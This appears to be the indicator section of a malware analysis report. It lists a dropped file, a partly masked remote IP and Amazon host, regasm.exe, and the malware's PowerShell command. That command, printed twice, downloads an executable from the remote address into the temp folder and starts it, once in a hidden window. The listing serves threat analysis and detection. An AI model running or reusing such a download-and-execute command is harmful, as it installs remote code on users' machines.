Technical Information
- '%TEMP%\hgkeoos78.exe'
- http://34.##.116.148/jalv/09.exe as %temp%\hgkeoos78.exe
- %WINDIR%\microsoft.net\framework\v2.0.50727\regasm.exe
- %TEMP%\hgkeoos78.exe
- http://34.##.116.148/jalv/09.exe
- http://ch#####.amazonaws.com/
- DNS ASK ch#####.amazonaws.com
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://34.##.116.148/jalv/09.exe','%temp%\hgkeoos78.exe'); Start '%temp%\hgkeoos78.exe'' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://34.##.116.148/jalv/09.exe','%temp%\hgkeoos78.exe'); Start '%temp%\hgkeoos78.exe'
- '%WINDIR%\microsoft.net\framework\v2.0.50727\regasm.exe'